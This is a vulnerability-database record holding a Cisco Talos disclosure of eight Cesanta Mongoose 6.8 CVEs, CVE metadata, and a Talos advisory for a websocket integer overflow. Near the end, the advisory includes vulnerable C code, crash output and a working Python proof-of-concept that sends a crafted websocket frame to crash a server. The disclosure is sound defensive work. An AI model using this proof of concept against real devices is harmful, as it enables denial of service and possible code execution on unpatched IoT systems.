<i>These vulnerabilities were discovered by Aleksandar Nikolic of Cisco Talos</i><br /><br />
Today, Talos is disclosing several vulnerabilities that have been identified in the Cesanta Mongoose server.<br /><br />
Cesanta Mongoose is a library implementing a number of networking protocols, including HTTP, MQTT, MDNS and others. It is designed with embedded devices in mind and as such is used in many IoT devices and runs on virtually all popular IoT platforms. The small size of the software enables any Internet-connected device to function as a web server. Mongoose is available under GPL v2 and commercial licenses. All of the vulnerabilities described here are fixed in version <a href="https://github.com/cesanta/mongoose/releases/tag/6.10">6.10</a> of the library.<br /><br />
<h2 id="h.t35gb7jnv6c3">Vulnerability Details</h2>
<h3 id="h.p7ist89g16m5">TALOS-2017-0398 (CVE-2017-2891) - Cesanta Mongoose HTTP Server CGI Remote Code Execution Vulnerability</h3>
<a href="http://www.talosintelligence.com/reports/TALOS-2017-0398">TALOS-2017-0398</a> manifests itself as an exploitable use-after-free vulnerability that exists in the HTTP server implementation of Cesanta Mongoose 6.8. An ordinary HTTP POST request with a CGI target can cause a reuse of a previously freed pointer, potentially resulting in remote code execution. An attacker needs to send this HTTP request over the network to trigger this vulnerability.<br /><br />
<h3 id="h.bm8o08jc6uoq">TALOS-2017-0399 (CVE-2017-2892) - Cesanta Mongoose MQTT Payload Length Remote Code Execution</h3>
<a href="http://www.talosintelligence.com/reports/TALOS-2017-0399">TALOS-2017-0399</a> manifests itself as an exploitable arbitrary memory read vulnerability that exists in the MQTT packet parsing functionality of Cesanta Mongoose 6.8. A specially crafted MQTT packet can cause an out-of-bounds and arbitrary memory read and write, potentially resulting in information disclosure, denial of service and remote code execution. An attacker needs to send a specially crafted MQTT packet over the network to trigger this vulnerability.<br /><br />
<h3 id="h.nlmk6epmqnt6">TALOS-2017-0400 (CVE-2017-2893) - Cesanta Mongoose MQTT SUBSCRIBE Command Denial Of Service</h3>
<a href="http://www.talosintelligence.com/reports/TALOS-2017-0400">TALOS-2017-0400</a> describes an exploitable NULL pointer dereference vulnerability that exists in the MQTT packet parsing functionality of Cesanta Mongoose 6.8. An MQTT SUBSCRIBE packet can cause a NULL pointer dereference leading to a server crash and denial of service. An attacker needs to send a specially crafted MQTT packet over the network to trigger this vulnerability.<br /><br />
<h3 id="h.8tgqw5hpxxx3">TALOS-2017-0401 (CVE-2017-2894) - Cesanta Mongoose MQTT SUBSCRIBE Multiple Topics Remote Code Execution</h3>
<a href="http://www.talosintelligence.com/reports/TALOS-2017-0401">TALOS-2017-0401</a> is an exploitable stack buffer overflow vulnerability that exists in the MQTT packet parsing functionality of Cesanta Mongoose 6.8. A specially crafted MQTT SUBSCRIBE packet can cause a stack buffer overflow resulting in remote code execution. An attacker needs to send a specially crafted MQTT packet over the network to trigger this vulnerability.<br /><br />
<h3 id="h.cx86aeyjt9mm">TALOS-2017-0402 (CVE-2017-2895) - Cesanta Mongoose MQTT SUBSCRIBE Topic Length Information Leak</h3>
<a href="http://www.talosintelligence.com/reports/TALOS-2017-0402">TALOS-2017-0402</a> documents an exploitable arbitrary memory read vulnerability that exists in the MQTT packet parsing functionality of Cesanta Mongoose 6.8. A specially crafted MQTT SUBSCRIBE packet can cause an out-of-bounds and arbitrary memory read, potentially resulting in information disclosure and denial of service. An attacker needs to send a specially crafted MQTT packet over the network to trigger this vulnerability.<br /><br />
<h3 id="h.cr2a58dhmjy1">TALOS-2017-0416 (CVE-2017-2909) - Cesanta Mongoose DNS Query Compressed Name Pointer Denial Of Service</h3>
<a href="http://www.talosintelligence.com/reports/TALOS-2017-0416">TALOS-2017-0416</a> describes an infinite loop programming error that exists in the DNS server functionality of the Cesanta Mongoose 6.8 library. A specially crafted DNS request can cause an infinite loop resulting in high CPU usage and denial of service. An attacker can send a packet over the network to trigger this vulnerability.<br /><br />
<h3 id="h.yl3fl4awfow9">TALOS-2017-0428 (CVE-2017-2921) - Cesanta Mongoose Websocket Protocol Packet Length Code Execution Vulnerability</h3>
<a href="http://www.talosintelligence.com/reports/TALOS-2017-0428">TALOS-2017-0428</a> is an exploitable memory corruption vulnerability that exists in the Websocket protocol implementation of Cesanta Mongoose 6.8. A specially crafted websocket packet can cause an integer overflow leading to a heap buffer overflow, resulting in denial of service and potentially remote code execution. An attacker may be able to send a specially crafted websocket packet over the network to trigger this vulnerability.<br /><br />
<h3 id="h.dj3eivlw70fj">TALOS-2017-0429 (CVE-2017-2922) - Cesanta Mongoose Websocket Protocol Fragmented Packet Code Execution Vulnerability</h3>
<a href="http://www.talosintelligence.com/reports/TALOS-2017-0429">TALOS-2017-0429</a> describes an exploitable memory corruption vulnerability that exists in the Websocket protocol implementation of Cesanta Mongoose 6.8. A specially crafted websocket packet can cause a buffer to be allocated while leaving stale pointers behind, which can lead to a use-after-free vulnerability that can be exploited to achieve remote code execution. An attacker may be able to send a specially crafted websocket packet over the network to trigger this vulnerability.<br /><br />
For the full technical details of these vulnerabilities, please refer to the vulnerability advisories that are posted on our website:<br /><br />
<a href="http://www.talosintelligence.com/vulnerability-reports/">http://www.talosintelligence.com/vulnerability-reports/</a><br /><br />
<h2 id="h.f31c7khmn6lo">Discussion</h2>
IoT devices often have limited processing and memory resources, but they also require lightweight and resilient communications protocols. One of the protocols frequently used for IoT and mobile messaging applications is MQ Telemetry Transport (MQTT).<br /><br />
<a href="http://docs.oasis-open.org/mqtt/mqtt/v3.1.1/os/mqtt-v3.1.1-os.html">MQTT</a> is a lightweight network protocol used for publish/subscribe messaging between devices. MQTT is a standard protocol ratified by OASIS, a consortium for the adoption of open standards.<br /><br />
The protocol is designed to be open, simple and easy to implement, allowing thousands of lightweight clients to be supported by a single server. The design attempts to minimize bandwidth requirements while attempting to ensure reliability of delivery.<br /><br />
Cesanta Mongoose is a popular communications library designed as a lightweight embedded library supporting several server and client application layer protocols, such as <a href="https://www.w3.org/Protocols/">HTTP</a>, MQTT, <a href="https://www.w3.org/TR/2011/WD-websockets-20110929/">WebSockets</a>, <a href="https://www.isc.org/community/rfcs/dns/">DNS</a> and <a href="https://tools.ietf.org/html/rfc7252">CoAP</a>. It is designed with embedded devices in mind and as such is used in many IoT devices and runs on virtually all popular IoT platforms.<br /><br />
These vulnerabilities discovered by Talos may allow attackers to take over implementations of vulnerable versions of the Cesanta Mongoose server and control individual devices as well as the associated servers running it. Users are advised to work with the affected device vendors to ensure that the latest security patches for Cesanta Mongoose are applied to all vulnerable devices and applications.<br /><br />
<h2 id="h.610e9o9vgbc4">Coverage</h2>
The following Snort Rules detect attempts to exploit these vulnerabilities. Please note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For all current rule information, please refer to your Firepower Management Center or Snort.org.<br /><br />
Snort Rules:<br /><br />
<ul><li>23039 - 23040</li></ul>
{"bulletinFamily": "blog", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "lastseen": "2017-12-25T19:52:52", "references": [], "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/geK06cY9cxs/vulnerability-spotlight-multiple_31.html", "type": "talosblog", "cvelist": ["CVE-2017-2891", "CVE-2017-2892", "CVE-2017-2893", "CVE-2017-2894", "CVE-2017-2895", "CVE-2017-2909", "CVE-2017-2921", "CVE-2017-2922"], "enchantments_done": [], "title": "Vulnerability Spotlight: Multiple Vulnerabilities in Cesanta Mongoose Server", "id": "TALOSBLOG:BF9B74979C194FA29647576078478DE0", "description": "<i>These vulnerabilities were discovered by Aleksandar Nikolic of Cisco Talos</i><br /><br />Today, Talos is disclosing several vulnerabilities that have been identified in Cesanta Mongoose server. <br /><br />Cesanta Mongoose is a library implementing a number of networking protocols, including HTTP, MQTT, MDNS and others. It is designed with embedded devices in mind and as such is used in many IoT devices and runs on virtually all popular IoT platforms. The small size of the software enables any Internet-connected device to function as a web server. Mongoose is available under GPL v2 and commercial licenses.<br /> All these discovered vulnerabilities are fixed in version <a href=\"https://github.com/cesanta/mongoose/releases/tag/6.10\">6.10</a> of the library. <br /><br /><a name='more'></a><br /><br /><h2 id=\"h.t35gb7jnv6c3\">Vulnerability Details</h2><br /><h3 id=\"h.p7ist89g16m5\">TALOS-2017-0398 (CVE-2017-2891) - Cesanta Mongoose HTTP Server CGI Remote Code Execution Vulnerability</h3><br /><a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0398\">TALOS-2017-0398</a> manifests itself as an exploitable use-after-free vulnerability that exists in the HTTP server implementation of Cesanta Mongoose 6.8. 
An ordinary HTTP POST request with a CGI target can cause a reuse of a previously freed pointer potentially resulting in remote code execution. An attacker needs to send this HTTP request over the network to trigger this vulnerability.<br /><br /><h3 id=\"h.bm8o08jc6uoq\">TALOS-2017-0399 (CVE-2017-2892) - Cesanta Mongoose MQTT Payload Length Remote Code Execution</h3><br /><a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0399\">TALOS-2017-0399</a> manifests itself as an exploitable arbitrary memory read vulnerability that exists in the MQTT packet parsing functionality of Cesanta Mongoose 6.8. A specially crafted MQTT packet can cause an out of bounds and arbitrary memory read and write, potentially resulting in information disclosure, denial of service and remote code execution. An attacker needs to send a specially crafted MQTT packet over the network to trigger this vulnerability.<br /><br /><h3 id=\"h.nlmk6epmqnt6\">TALOS-2017-0400 (CVE-2017-2893) - Cesanta Mongoose MQTT SUBSCRIBE Command Denial Of Service</h3><br /><a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0400\">TALOS-2017-0400</a> describes an exploitable NULL pointer dereference vulnerability that exists in the MQTT packet parsing functionality of Cesanta Mongoose 6.8. An MQTT SUBSCRIBE packet can cause a NULL pointer dereference leading to a server crash and denial of service. An attacker needs to send a specially crafted MQTT packet over the network to trigger this vulnerability.<br /><br /><h3 id=\"h.8tgqw5hpxxx3\">TALOS-2017-0401 (CVE-2017-2894) - Cesanta Mongoose MQTT SUBSCRIBE Multiple Topics Remote Code Execution</h3><br /><a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0401\">TALOS-2017-0401</a> is an exploitable stack buffer overflow vulnerability that exists in the MQTT packet parsing functionality of Cesanta Mongoose 6.8. A specially crafted MQTT SUBSCRIBE packet can cause a stack buffer overflow resulting in remote code execution. 
An attacker needs to send a specially crafted MQTT packet over the network to trigger this vulnerability.<br /><br /><h3 id=\"h.cx86aeyjt9mm\">TALOS-2017-0402 (CVE-2017-2895) - Cesanta Mongoose MQTT SUBSCRIBE Topic Length Information Leak</h3><br /><a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0402\">TALOS-2017-0402</a> documents an exploitable arbitrary memory read vulnerability that exists in the MQTT packet parsing functionality of Cesanta Mongoose 6.8. A specially crafted MQTT SUBSCRIBE packet can cause an out of bounds and arbitrary memory read potentially resulting in information disclosure and denial of service. An attacker needs to send a specially crafted MQTT packet over the network to trigger this vulnerability.<br /><br /><h3 id=\"h.cr2a58dhmjy1\">TALOS-2017-0416 (CVE-2017-2909) - Cesanta Mongoose DNS Query Compressed Name Pointer Denial Of Service</h3><br /><a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0416\">TALOS-2017-0416</a> describes an infinite loop programming error that exists in the DNS server functionality of Cesanta Mongoose 6.8 library. A specially crafted DNS request can cause an infinite loop resulting in high CPU usage and Denial Of Service. An attacker can send a packet over the network to trigger this vulnerability. <br /><br /><h3 id=\"h.yl3fl4awfow9\">TALOS-2017-0428 (CVE-2017-2921) - Cesanta Mongoose Websocket Protocol Packet Length Code Execution Vulnerability</h3><br /><a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0428\">TALOS-2017-0428</a> is an exploitable memory corruption vulnerability that exists in the Websocket protocol implementation of Cesanta Mongoose 6.8. A specially crafted websocket packet can cause an integer overflow leading to a heap buffer overflow resulting in denial of service and potentially remote code execution. 
An attacker may be able to send a specially crafted websocket packet over the network to trigger this vulnerability.<br /><br /><h3 id=\"h.dj3eivlw70fj\">TALOS-2017-0429 (CVE-2017-2922) - Cesanta Mongoose Websocket Protocol Fragmented Packet Code Execution Vulnerability</h3><br /><a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0429\">TALOS-2017-0429</a> describes an exploitable memory corruption vulnerability that exists in the Websocket protocol implementation of Cesanta Mongoose 6.8. A specially crafted websocket packet can cause a buffer to be allocated while leaving stale pointers which can lead to use-after-free vulnerability that can be exploited to achieve remote code execution. An attacker may be able to send a specially crafted websocket packet over the network to trigger this vulnerability.<br /><br />For the full technical details of these vulnerabilities, please refer to the vulnerability advisories that are posted on our website:<br /><br /><a href=\"http://www.talosintelligence.com/vulnerability-reports/\">http://www.talosintelligence.com/vulnerability-reports/</a><br /><br /><h2 id=\"h.f31c7khmn6lo\">Discussion</h2><br />IoT devices often have limited processing and memory resources but they also require lightweight and resilient communications protocols. One of the protocols frequently used for IoT and mobile messaging applications is MQ Telemetry Transport (MQTT).<br /><br /><a href=\"http://docs.oasis-open.org/mqtt/mqtt/v3.1.1/os/mqtt-v3.1.1-os.html\">MQTT</a> is a lightweight network protocol used for publish/subscribe messaging between devices. MQTT is a standard protocol accepted by the OASIS consortium for the adoption of open standards. <br /><br />The protocol is designed to be open, simple and easy to implement, allowing thousands of lightweight clients to be supported by a single server. 
The design attempts to minimize bandwidth requirements while attempting to ensure reliability of delivery.<br /><br />Cesanta Mongoose is a popular communications library designed for implementation as a lightweight embedded library supporting several server and client application layer protocols, such as <a href=\"https://www.w3.org/Protocols/\">HTTP</a>, MQTT, <a href=\"https://www.w3.org/TR/2011/WD-websockets-20110929/\">WebSockets</a>, <a href=\"https://www.isc.org/community/rfcs/dns/\">DNS</a> and <a href=\"https://tools.ietf.org/html/rfc7252\">CoAP</a>. It is designed with embedded devices in mind and as such is used in many IoT devices and runs on virtually all popular IoT platforms.<br /><br />These vulnerabilities discovered by Talos may allow attackers to take over implementations of vulnerable versions of the Cesanta Mongoose server and control individual devices as well as the associated servers running it. Users are recommended to work with the affected device vendors to ensure that the latest security patches for Cesanta Mongoose are applied to all vulnerable devices and applications. <br /><br /><h2 id=\"h.610e9o9vgbc4\">Coverage</h2><br />The following Snort Rules detect attempts to exploit these vulnerabilities. Please note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. 
For all current rule information, please refer to your Firepower Management Center or Snort.org.<br /><br />Snort Rules: <br /><br /><ul><li>23039 - 23040</li></ul><br /><br /><div class=\"feedflare\">\n<a href=\"http://feeds.feedburner.com/~ff/feedburner/Talos?a=geK06cY9cxs:QobJuzBhpB0:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/feedburner/Talos?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/feedburner/Talos/~4/geK06cY9cxs\" height=\"1\" width=\"1\" alt=\"\"/>", "modified": "2017-10-31T15:59:27", "reporter": "noreply@blogger.com (Vanja Svajcer)", "published": "2017-10-31T08:12:00", "enchantments": {"score": {"value": 1.1, "vector": "NONE"}, "dependencies": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2017-1001"]}, {"type": "cve", "idList": ["CVE-2017-2891", "CVE-2017-2892", "CVE-2017-2893", "CVE-2017-2894", "CVE-2017-2895", "CVE-2017-2909", "CVE-2017-2921", "CVE-2017-2922"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2017-2891", "DEBIANCVE:CVE-2017-2892", "DEBIANCVE:CVE-2017-2893", "DEBIANCVE:CVE-2017-2894", "DEBIANCVE:CVE-2017-2895", "DEBIANCVE:CVE-2017-2909", "DEBIANCVE:CVE-2017-2921", "DEBIANCVE:CVE-2017-2922"]}, {"type": "redhatcve", "idList": ["RH:CVE-2017-2893", "RH:CVE-2017-2921"]}, {"type": "seebug", "idList": ["SSV:96806", "SSV:96807", "SSV:96808", "SSV:96809", "SSV:96811", "SSV:96831", "SSV:96834", "SSV:96835"]}, {"type": "talos", "idList": ["TALOS-2017-0398", "TALOS-2017-0399", "TALOS-2017-0400", "TALOS-2017-0401", "TALOS-2017-0402", "TALOS-2017-0416", "TALOS-2017-0428", "TALOS-2017-0429"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2017-2891", "UB:CVE-2017-2892", "UB:CVE-2017-2893", "UB:CVE-2017-2894", "UB:CVE-2017-2895", "UB:CVE-2017-2909", "UB:CVE-2017-2921", "UB:CVE-2017-2922"]}]}, "backreferences": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2017-1001"]}, {"type": "cve", "idList": ["CVE-2017-2891", "CVE-2017-2892", "CVE-2017-2893", 
"CVE-2017-2894", "CVE-2017-2895", "CVE-2017-2909", "CVE-2017-2921", "CVE-2017-2922"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2017-2891", "DEBIANCVE:CVE-2017-2892", "DEBIANCVE:CVE-2017-2893", "DEBIANCVE:CVE-2017-2894", "DEBIANCVE:CVE-2017-2895", "DEBIANCVE:CVE-2017-2909", "DEBIANCVE:CVE-2017-2921", "DEBIANCVE:CVE-2017-2922"]}, {"type": "seebug", "idList": ["SSV:96806", "SSV:96807", "SSV:96808", "SSV:96809", "SSV:96811", "SSV:96835"]}, {"type": "talos", "idList": ["TALOS-2017-0398", "TALOS-2017-0399", "TALOS-2017-0400", "TALOS-2017-0401", "TALOS-2017-0402", "TALOS-2017-0416", "TALOS-2017-0428", "TALOS-2017-0429"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2017-2891", "UB:CVE-2017-2892", "UB:CVE-2017-2893", "UB:CVE-2017-2894", "UB:CVE-2017-2895", "UB:CVE-2017-2909", "UB:CVE-2017-2921", "UB:CVE-2017-2922"]}]}, "exploitation": null, "vulnersScore": 1.1}, "viewCount": 33, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1660004461, "score": 1660008386}, "_internal": {"score_hash": "328772214de79234b1998db5e6839b57"}}
{"redhatcve": [{"lastseen": "2022-05-21T01:24:59", "description": "An exploitable NULL pointer dereference vulnerability exists in the MQTT packet parsing functionality of Cesanta Mongoose 6.8. An MQTT SUBSCRIBE packet can cause a NULL pointer dereference leading to server crash and denial of service. An attacker needs to send a specially crafted MQTT packet over the network to trigger this vulnerability.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-20T23:50:57", "type": "redhatcve", "title": "CVE-2017-2893", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2891", "CVE-2017-2892", "CVE-2017-2893", "CVE-2017-2894", "CVE-2017-2895", "CVE-2017-2909", "CVE-2017-2921", "CVE-2017-2922"], "modified": "2022-05-20T23:50:57", "id": "RH:CVE-2017-2893", "href": "https://access.redhat.com/security/cve/cve-2017-2893", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-05-21T01:24:59", "description": "An exploitable memory corruption vulnerability exists in the Websocket protocol implementation of Cesanta Mongoose 6.8. 
A specially crafted websocket packet can cause an integer overflow, leading to a heap buffer overflow and resulting in denial of service and potential remote code execution. An attacker needs to send a specially crafted websocket packet over network to trigger this vulnerability.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-20T23:55:38", "type": "redhatcve", "title": "CVE-2017-2921", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2891", "CVE-2017-2892", "CVE-2017-2893", "CVE-2017-2894", "CVE-2017-2895", "CVE-2017-2909", "CVE-2017-2921", "CVE-2017-2922"], "modified": "2022-05-20T23:55:38", "id": "RH:CVE-2017-2921", "href": "https://access.redhat.com/security/cve/cve-2017-2921", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "talos": [{"lastseen": "2022-06-13T22:03:01", "description": "### Summary\n\nAn exploitable memory corruption vulnerability exists in the Websocket protocol implementation of Cesanta Mongoose 6.8. 
A specially crafted websocket packet can cause an integer overflow resulting leading to heap buffer overflow resulting in denial of service and potential remote code execution. An attacker needs to send a specially crafted websocket packet over network to trigger this vulnerability.\n\n### Tested Versions\n\nCesanta Mongoose 6.8\n\n### Product URLs\n\n<https://cesanta.com/>\n\n### CVSSv3 Score\n\n8.1 - CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\n\n### CWE\n\nCWE-190: Integer Overflow or Wraparound\n\n### Details\n\nMongoose is a monolithic library implementing a number of networking protocols, including HTTP, MQTT, MDNS and others. Its HTTP implementation includes upgrade support required for websocket applications. It is designed with embedded devices in mind and as such is used in many IoT devices and runs on virtually all platforms.\n\nAfter the initial websocket handshake and while parsing a websocket packet, an integer overflow involving header length and packet size can occur. Insufficient checks after the potential overflow can later lead to very large memory overwrite which can result in heap memory corruption, process crash and potentially in remote code execution.\n \n \n Function `mg_deliver_websocket_data` is responsible for parsing the websocket packet. 
Relevant code is:\n \n \n \n uint64_t i, data_len = 0, frame_len = 0, buf_len = nc->recv_mbuf.len, len, [1]\n mask_len = 0, header_len = 0;\n ...\n if (buf_len >= 2) \n ...\n else if (buf_len >= 10 + mask_len) \n header_len = 10 + mask_len; [2]\n data_len = (((uint64_t) ntohl(*(uint32_t *) &buf[2])) << 32) + [3]\n ntohl(*(uint32_t *) &buf[6]);\n \n \n \n frame_len = header_len + data_len; [4]\n ok = frame_len > 0 && frame_len <= buf_len; [5]\n \n if (ok) \n ...\n /* Apply mask if necessary */\n if (mask_len > 0) { \n for (i = 0; i < data_len; i++) \n buf[i + header_len] ^= (buf + header_len - mask_len)[i % 4]; [6]\n \n\nIn the above code, we can see at [1] local variables `frame_len`, `header_len` and `data_len` being declared as 64bit unsigned integers. At [2] header length is calculated since websocket protocol specifies variable length headers. At [3], 8 bytes from the packet are used as `data_len` directly. At [4], total `frame_len` is calculated and at [5] basic sanity checks are performed. If everything is ok, and the packet has mask bit set, at [6] all the data in the buffer is XORed with 4 byte mask.\n\nAn insufficient check above at [5] can allow for an integer overflow to pass undetected. In case `data_len`is a very large value, adding `header_len` to it can lead to integer wraparound , resulting in small `frame_len` value. Small `frame_len` value passes `frame_len <= buf_len` check, while `data_len` is still huge and bigger than the actual buffer size. 
This results in a large heap overflow at [6] as the for loop is bounded by `data_len` only.\n\nThis causes the process to crash, leading to denial of service and in some cases potentially to remote code execution.\n\n### Crash Information\n \n \n Address sanitizer output:\n \n ==88164==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x619000006380 at pc 0x00000051abae bp 0x7fffffffb490 sp \n 0x7fffffffb488\n READ of size 1 at 0x619000006380 thread T0\n #0 0x51abad in mg_deliver_websocket_data /home/user/mongoose/examples/websocket_chat/../../mongoose.c:8866\n #1 0x51abad in ?? ??:0\n #2 0x5128d4 in mg_ws_handler /home/user/mongoose/examples/websocket_chat/../../mongoose.c:9045 (discriminator 1)\n #3 0x5128d4 in ?? ??:0\n #4 0x4f9de6 in mg_call /home/user/mongoose/examples/websocket_chat/../../mongoose.c:2051\n #5 0x4f9de6 in ?? ??:0\n #6 0x4fdcf9 in mg_recv_common /home/user/mongoose/examples/websocket_chat/../../mongoose.c:2502\n #7 0x4fdcf9 in ?? ??:0\n #8 0x506603 in mg_if_recv_tcp_cb /home/user/mongoose/examples/websocket_chat/../../mongoose.c:2506\n #9 0x506603 in mg_handle_tcp_read /home/user/mongoose/examples/websocket_chat/../../mongoose.c:3372\n #10 0x506603 in mg_mgr_handle_conn /home/user/mongoose/examples/websocket_chat/../../mongoose.c:3497\n #11 0x506603 in ?? ??:0\n #12 0x509dd8 in mg_socket_if_poll /home/user/mongoose/examples/websocket_chat/../../mongoose.c:3690\n #13 0x509dd8 in ?? ??:0\n #14 0x4fb695 in mg_mgr_poll /home/user/mongoose/examples/websocket_chat/../../mongoose.c:2232\n #15 0x4fb695 in ?? ??:0\n #16 0x4ea65a in main /home/user/mongoose/examples/websocket_chat/websocket_chat.c:78\n #17 0x4ea65a in ?? ??:0\n #18 0x7ffff6ee582f in __libc_start_main /build/glibc-bfm8X4/glibc-2.23/csu/../csu/libc-start.c:291\n #19 0x7ffff6ee582f in ?? ??:0\n #20 0x418e58 in _start ??:?\n #21 0x418e58 in ?? 
??:0\n \n \n 0x619000006380 is located 0 bytes to the right of 1024-byte region [0x619000005f80,0x619000006380)\n allocated by thread T0 here:\n #0 0x4b8f88 in __interceptor_malloc ??:?\n #1 0x4b8f88 in ?? ??:0\n #2 0x506453 in mg_handle_tcp_read /home/user/mongoose/examples/websocket_chat/../../mongoose.c:3336 (discriminator 1)\n #3 0x506453 in mg_mgr_handle_conn /home/user/mongoose/examples/websocket_chat/../../mongoose.c:3497 (discriminator 1)\n #4 0x506453 in ?? ??:0\n #5 0x509dd8 in mg_socket_if_poll /home/user/mongoose/examples/websocket_chat/../../mongoose.c:3690\n #6 0x509dd8 in ?? ??:0\n #7 0x4fb695 in mg_mgr_poll /home/user/mongoose/examples/websocket_chat/../../mongoose.c:2232\n #8 0x4fb695 in ?? ??:0\n #4 0x60200000efef (<unknown module>)\n \n SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/user/mongoose/examples/websocket_chat/websocket_chat+0x51abad)\n Shadow bytes around the buggy address:\n 0x0c327fff8c20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n 0x0c327fff8c30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n 0x0c327fff8c40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n 0x0c327fff8c50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n 0x0c327fff8c60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n =>0x0c327fff8c70:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n 0x0c327fff8c80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n 0x0c327fff8c90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n 0x0c327fff8ca0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n 0x0c327fff8cb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n 0x0c327fff8cc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n Shadow byte legend (one shadow byte represents 8 application bytes):\n Addressable: 00\n Partially addressable: 01 02 03 04 05 06 07\n Heap left redzone: fa\n Heap right redzone: fb\n Freed heap region: fd\n Stack left redzone: f1\n Stack mid redzone: f2\n Stack right redzone: f3\n Stack partial redzone: f4\n Stack after return: f5\n Stack 
use after scope: f8\n Global redzone: f9\n Global init order: f6\n Poisoned by user: f7\n Container overflow: fc\n Array cookie: ac\n Intra object redzone: bb\n ASan internal: fe\n Left alloca redzone: ca\n Right alloca redzone: cb\n ==88164==ABORTING\n \n\n### Exploit Proof-of-Concept\n \n \n import socket\n import struct\n import sys\n http_upgrade = ('GET /chat HTTP/1.1\\r\\n'\n 'Host: server.example.com\\r\\n'\n 'Upgrade: websocket\\r\\n'\n 'Connection: Upgrade\\r\\n'\n 'Sec-WebSocket-Key: x3JJHMbDL1EzLkh9GBhXDw==\\r\\n'\n 'Sec-WebSocket-Protocol: chat, superchat\\r\\n'\n 'Sec-WebSocket-Version: 13\\r\\n'\n 'Origin: http://example.com\\r\\n\\r\\n')\n #only HTTP \"Upgrade: websocket\" header matters above, the above GET request was copied verbatim from wikipedia\n \n \n payload = \"\\x00\" # FIN flag doesn't matter, opcode doesn't matter\n payload += chr(0x80 | 127 ) # mask is set, payload len of 127 means next 64 bits are actual payload len\n payload_len = 0xffffffffffffffff -12 #actual payload len\n payload += struct.pack(\"!Q\",payload_len)\n masking_key = 0 #masking key can be anything, and would need to be a specific value in real exploit\n payload += struct.pack(\"I\",masking_key)\n payload += \"A\"*40 #garbage to pad the packet\n \n \n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.connect((sys.argv[1],int(sys.argv[2])))\n s.send(http_upgrade)\n print s.recv(1024)\n s.send(payload)\n print s.recv(1024)\n \n\n### Timeline\n\n2017-08-30 - Vendor Disclosure \n2017-10-31 - Public Release\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": 